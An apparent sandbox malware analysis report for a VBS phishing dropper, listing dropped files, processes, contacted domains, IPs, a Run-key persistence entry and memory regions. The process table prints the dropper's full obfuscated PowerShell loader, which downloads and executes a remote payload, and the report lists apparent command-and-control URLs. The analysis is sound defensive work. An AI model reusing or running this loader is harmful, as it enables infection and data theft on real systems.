Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
PO 26519PZ F30 59.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2xvtm0kh.pi3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3md13j5e.wgr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5elpknk4.obd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1knx4vi.jz5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\dvvZj3l0
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie
0x37, schema 4, UTF-8, version-valid-for 8
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Udjvne.Mai
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO 26519PZ F30 59.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function
Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela;
$Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function
Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc
l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum
InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc
) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart
fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape
P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl
o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo
Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p
tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin
';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh
ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi
Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl
Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi
.rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens
(Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses
Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig
Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap
taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr
nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett
aKor enUnstokEndo,lAndefi ,aranStren.stateHLovfseCamisaEjegodMarkeeg dkerDeskrsAs ar[ Sk.p$valuiBUn ero Wedgm.rfarbmngdeiSpec
cRugekcKand.iEluvitDiskoeG.nic2ac im4Leath0unres]Triv.=Undou$,hiriWBrdskeDisred InseelimonlValmun Gta s Bebl ');$Oralises=Nepotistic
'BorepF ChefrParala etern F.ctkUnwhilO erliBookbnrever.GeggeDTjen,oHusarwAs ernSekunlQuiesoBet ga Un,edSurfmFV.ldmiB,gralArkolegenne(Nonex$Hen,eCTiebohCiga.aAfb.lrForhagUnlegeAm
rfr,ddad,Frman$VentrD UndeaBusu tFreelaPeta,k ImproPembinOdonttKinoorbdni,oFljlslLundylLunseeBlamerEmbr,) turk ';$Oralises=$Uncavernously[1]+$Oralises;$Datakontroller=$Uncavernously[0];Enrens
(Nepotistic 'syssa$,ropagStuehl bladoWhi.tbUforkaRa eflA tar:NonsiRDe trere,cccKvilioLambdgAfhugnPrstei KedlzNedisiSolutnEpigrgBrn,sl
onvyCusp.=phosp(BueskT UndiepostfsAlk mtOr,an-HypogP Spela in.utInnovh,iscu Renta$ MonaD s ndaTykmat ArthaByudvkSn,ffoV.dignPi
uat Sa sr Angio Che,lYeravlUdlggeCossnrRela.) Tro ');while (!$Recognizingly) {Enrens (Nepotistic ' Sfri$Rec,tgWienelAntr,oSpkn,bTr.kkaTheoclS,dek:S.ppoNGra
ieTrav dBetnktIncinr HybraBymllpLevitpAltiteMewlenSurdedM,kaeeSv,nssDoghe=Refra$ lovotEndocr TrumubumbleHal,c ') ;Enrens $Oralises;Enrens
(Nepotistic 'Hal.mSJodhptOmkalaDonalrCabeztKompo-HippoSUhvislEftereStrekeSquo.pTornu Dgnpr4Omvur ');Enrens (Nepotistic 'F.dbo$AccorgKlienl
ShoroavestbFo uragon rl lydi: ScapR BypleHandscHyperoP,ttegFejltn D.siiSeismzstopui RibonForkegBlankl RdtuyR aka= uiti(Diza,T
ScoaeKrak,sKlimatMejsl-ResunPV,nneaSweentAmmo,hSard Forpr$ UdfrDKonomaAndentFrdigaLogopk Kon o RomtnPaedet AkacrtiltuopalmelMus.al,heateOmnicrTinse)Tut,b
') ;Enrens (Nepotistic 'Mi,it$stoccgSongmlDreamoChancbSoapia strol Pink:SenonB falsemes,erPre.egInterePragmrTierse RefisEndog=
Tr k$MedalgpelomlMac ooFa tibSporuaS cralUnhum:Mis oGO.teolT,ksoaChit.dCirkleContalHjla.i No,ckObiiseUdhng+Uncir+bbsmu% Fler$FempeSWighttCheesuSpidsf
W.vefPh toiMarlonRe leeHer.esOvertsDissi. StracTheoloBeha u I.fenKalketGerm ') ;$Charger=$Stuffiness[$Bergeres];}Enrens (Nepotistic
'Desil$LancigMomiplBrev,oNat,ebkit.ha UncrlB anc:QuintDHa.ukePietepT pijoSkratlChemiaPost.rCollyi mplosAmatriK,nden Neurg
Tern3Overa3overh Venst=Mil t Nga.sGLa,ane KilotUnpau-MerotCFolkeo Bra nHystetEgalleTylosn FremtFabri hjert$PetroD.hthaadelsptalabaaAssimkDensio
ortenKernetStra,rLovgeoDe.ydlOvertlCest.eLang,rVolum ');Enrens (Nepotistic 'Rhino$GrydegSoph,l Bom,oHestebAft.saPanhyl An,i:TpkevG
Mo,ie Distn Overn,equie,lgormBioditUnsnarKalvenE,progUdrade Faucrdi.ko ,inia= T.ds Whips[g oseSSunshyIntwis ,ncytCoitueStru,mTally.AtriuCIndoloLaesenPinprv
Toule Annar Smaat.nave]Udsmu:Nonpr: VankF Clabr.mpero Floom Gi uB DigiaMonkms Str enondi6 Aktu4ArithSAfpritLauncrHekseiIndbun
FravgA,ist( Hydr$ HereDMo oceParanp SepaoSnifflSagfoaCollerReawoiUnappsFranciHissyn Mejeg Diec3neofa3G,und) Funk ');Enrens
(Nepotistic ' Blis$OkkergTiggel DictoOest,bRufgaaTrihylSkovk:Po.stT Sovrj Res,uKre,ar ,pichMu iaaSurminUblegelibernFo.ha
B ul=Enrag Fyldj[SlagtS ,lotySkvetsOs.untQuanteEngromNorma.GrailTUnvoyeInterxFilantBrnef. ParaEFratrnBegl c DecuoArmagd TaksiDv
gan tikgRetfr] pekt:Udg,a:.onraAW,ariSAerobCD.engIeksk I Lith. PrsiGN ndeeSmrb tH,perS LiggtFortor OveriDu,elnDetaig onv(Ikend$
T,igGKandeeR,masnBatf,nTailoenonelmlite tU,offrVoldtnNikolgPr cte,roderBrovs) Comp ');Enrens (Nepotistic 'sbefa$UnorpgUddatl
OphooMatilbOutbraTriollLymph:AppreWScallhP ffiiAllestFr tilDis ooMurkrcKikuskDetin= alci$JustiTarglejBrideuKuch.r C.ichGree,aSpin.nCorduexenonnVindh.Rea
fs Fo.kuCornfbDrawrsl,ptot Pantr Ambui Coxan Ka,egPrint(Luktc3 .opu1Myel 4,nted6 Bajo6 Hexi1Nons.,bilab2Mis,i8Hidk,5Vkst 9Thirs2Assec)Unbar
');Enrens $Whitlock;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function
Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela;
$Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function
Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc
l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum
InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc
) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart
fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape
P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl
o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo
Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p
tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin
';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh
ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi
Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl
Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi
.rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens
(Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses
Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig
Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap
taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr
nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett
aKor enUnstokEndo,lAndefi ,aranStren.stateHLovfseCamisaEjegodMarkeeg dkerDeskrsAs ar[ Sk.p$valuiBUn ero Wedgm.rfarbmngdeiSpec
cRugekcKand.iEluvitDiskoeG.nic2ac im4Leath0unres]Triv.=Undou$,hiriWBrdskeDisred InseelimonlValmun Gta s Bebl ');$Oralises=Nepotistic
'BorepF ChefrParala etern F.ctkUnwhilO erliBookbnrever.GeggeDTjen,oHusarwAs ernSekunlQuiesoBet ga Un,edSurfmFV.ldmiB,gralArkolegenne(Nonex$Hen,eCTiebohCiga.aAfb.lrForhagUnlegeAm
rfr,ddad,Frman$VentrD UndeaBusu tFreelaPeta,k ImproPembinOdonttKinoorbdni,oFljlslLundylLunseeBlamerEmbr,) turk ';$Oralises=$Uncavernously[1]+$Oralises;$Datakontroller=$Uncavernously[0];Enrens
(Nepotistic 'syssa$,ropagStuehl bladoWhi.tbUforkaRa eflA tar:NonsiRDe trere,cccKvilioLambdgAfhugnPrstei KedlzNedisiSolutnEpigrgBrn,sl
onvyCusp.=phosp(BueskT UndiepostfsAlk mtOr,an-HypogP Spela in.utInnovh,iscu Renta$ MonaD s ndaTykmat ArthaByudvkSn,ffoV.dignPi
uat Sa sr Angio Che,lYeravlUdlggeCossnrRela.) Tro ');while (!$Recognizingly) {Enrens (Nepotistic ' Sfri$Rec,tgWienelAntr,oSpkn,bTr.kkaTheoclS,dek:S.ppoNGra
ieTrav dBetnktIncinr HybraBymllpLevitpAltiteMewlenSurdedM,kaeeSv,nssDoghe=Refra$ lovotEndocr TrumubumbleHal,c ') ;Enrens $Oralises;Enrens
(Nepotistic 'Hal.mSJodhptOmkalaDonalrCabeztKompo-HippoSUhvislEftereStrekeSquo.pTornu Dgnpr4Omvur ');Enrens (Nepotistic 'F.dbo$AccorgKlienl
ShoroavestbFo uragon rl lydi: ScapR BypleHandscHyperoP,ttegFejltn D.siiSeismzstopui RibonForkegBlankl RdtuyR aka= uiti(Diza,T
ScoaeKrak,sKlimatMejsl-ResunPV,nneaSweentAmmo,hSard Forpr$ UdfrDKonomaAndentFrdigaLogopk Kon o RomtnPaedet AkacrtiltuopalmelMus.al,heateOmnicrTinse)Tut,b
') ;Enrens (Nepotistic 'Mi,it$stoccgSongmlDreamoChancbSoapia strol Pink:SenonB falsemes,erPre.egInterePragmrTierse RefisEndog=
Tr k$MedalgpelomlMac ooFa tibSporuaS cralUnhum:Mis oGO.teolT,ksoaChit.dCirkleContalHjla.i No,ckObiiseUdhng+Uncir+bbsmu% Fler$FempeSWighttCheesuSpidsf
W.vefPh toiMarlonRe leeHer.esOvertsDissi. StracTheoloBeha u I.fenKalketGerm ') ;$Charger=$Stuffiness[$Bergeres];}Enrens (Nepotistic
'Desil$LancigMomiplBrev,oNat,ebkit.ha UncrlB anc:QuintDHa.ukePietepT pijoSkratlChemiaPost.rCollyi mplosAmatriK,nden Neurg
Tern3Overa3overh Venst=Mil t Nga.sGLa,ane KilotUnpau-MerotCFolkeo Bra nHystetEgalleTylosn FremtFabri hjert$PetroD.hthaadelsptalabaaAssimkDensio
ortenKernetStra,rLovgeoDe.ydlOvertlCest.eLang,rVolum ');Enrens (Nepotistic 'Rhino$GrydegSoph,l Bom,oHestebAft.saPanhyl An,i:TpkevG
Mo,ie Distn Overn,equie,lgormBioditUnsnarKalvenE,progUdrade Faucrdi.ko ,inia= T.ds Whips[g oseSSunshyIntwis ,ncytCoitueStru,mTally.AtriuCIndoloLaesenPinprv
Toule Annar Smaat.nave]Udsmu:Nonpr: VankF Clabr.mpero Floom Gi uB DigiaMonkms Str enondi6 Aktu4ArithSAfpritLauncrHekseiIndbun
FravgA,ist( Hydr$ HereDMo oceParanp SepaoSnifflSagfoaCollerReawoiUnappsFranciHissyn Mejeg Diec3neofa3G,und) Funk ');Enrens
(Nepotistic ' Blis$OkkergTiggel DictoOest,bRufgaaTrihylSkovk:Po.stT Sovrj Res,uKre,ar ,pichMu iaaSurminUblegelibernFo.ha
B ul=Enrag Fyldj[SlagtS ,lotySkvetsOs.untQuanteEngromNorma.GrailTUnvoyeInterxFilantBrnef. ParaEFratrnBegl c DecuoArmagd TaksiDv
gan tikgRetfr] pekt:Udg,a:.onraAW,ariSAerobCD.engIeksk I Lith. PrsiGN ndeeSmrb tH,perS LiggtFortor OveriDu,elnDetaig onv(Ikend$
T,igGKandeeR,masnBatf,nTailoenonelmlite tU,offrVoldtnNikolgPr cte,roderBrovs) Comp ');Enrens (Nepotistic 'sbefa$UnorpgUddatl
OphooMatilbOutbraTriollLymph:AppreWScallhP ffiiAllestFr tilDis ooMurkrcKikuskDetin= alci$JustiTarglejBrideuKuch.r C.ichGree,aSpin.nCorduexenonnVindh.Rea
fs Fo.kuCornfbDrawrsl,ptot Pantr Ambui Coxan Ka,egPrint(Luktc3 .opu1Myel 4,nted6 Bajo6 Hexi1Nons.,bilab2Mis,i8Hidk,5Vkst 9Thirs2Assec)Unbar
');Enrens $Whitlock;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe
|
"C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe"
|
|
|
|
C:\Windows\SysWOW64\icacls.exe
|
"C:\Windows\SysWOW64\icacls.exe"
|
|
|
|
C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe
|
"C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udjvne.Mai && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udjvne.Mai && echo $"
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://drive.google.com/;
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://www.blueberry-breeze.com/bnz5/
|
91.195.240.117
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://drive.usercontent.google.com/W
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://www.elysiangame.online/bnz5/?0TFT4=uPhDJ26p&OLTx7p=4BEdEKurUNEFwkFRegiDBzC7pj7sTtT0kB0gdoDHo+aBzggPclQDQJqF4ehpSB3lBDvuZzIzoYk2h0Zy/GWQVTCjZfM+P/Gg1ZlgpbDGRDiHo+BBw02A4+u5sqR3NAzj+twq1/A=
|
174.138.177.173
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://www.vvbgsekbo.store/bnz5/
|
43.132.169.95
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.blueberry-breeze.com/bnz5/?OLTx7p=Z7N7hXY/vxItmyrXNQB4LENYEQnuSZ4/X1tSw0B7uFqoJtXe6IwXeXQiXEM/Xr4/ado0xvKOz5lKhVT9TZmVF0n4DqYSIgGlD+rIwihPR/pSypoeDE6i9dqJvHBXbQcbaAkLZ9U=&0TFT4=uPhDJ26p
|
91.195.240.117
|
There are 18 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.collegeclubapparel.com
|
unknown
|
|
|
|
www.elysiangame.online
|
174.138.177.173
|
||
|
drive.google.com
|
142.250.81.238
|
||
|
drive.usercontent.google.com
|
142.250.65.225
|
||
|
www.blueberry-breeze.com
|
91.195.240.117
|
||
|
www.vvbgsekbo.store
|
43.132.169.95
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
91.195.240.117
|
www.blueberry-breeze.com
|
Germany
|
||
|
174.138.177.173
|
www.elysiangame.online
|
United States
|
||
|
43.132.169.95
|
www.vvbgsekbo.store
|
Japan
|
||
|
142.250.65.225
|
drive.usercontent.google.com
|
United States
|
||
|
142.250.81.238
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ML8XFNQ
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 12 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8400000
|
direct allocation
|
page execute and read and write
|
|
|
|
577D000
|
trusted library allocation
|
page read and write
|
|
|
|
A90000
|
trusted library allocation
|
page read and write
|
|
|
|
1569006C000
|
trusted library allocation
|
page read and write
|
|
|
|
2F30000
|
remote allocation
|
page execute and read and write
|
|
|
|
A50000
|
trusted library allocation
|
page read and write
|
|
|
|
8E90000
|
direct allocation
|
page execute and read and write
|
|
|
|
F00000
|
system
|
page execute and read and write
|
|
|
|
390000
|
system
|
page execute and read and write
|
|
|
|
2E00000
|
system
|
page execute and read and write
|
|
|
|
20E40000
|
unclassified section
|
page execute and read and write
|
|
|
|
39B0000
|
unkown
|
page execute and read and write
|
|
|
|
72810FE000
|
unkown
|
page read and write
|
||
|
43C9000
|
heap
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D16745000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7CDE000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
BAC000
|
stack
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
20D1673F000
|
heap
|
page read and write
|
||
|
EF6000
|
heap
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
7EF0000
|
trusted library allocation
|
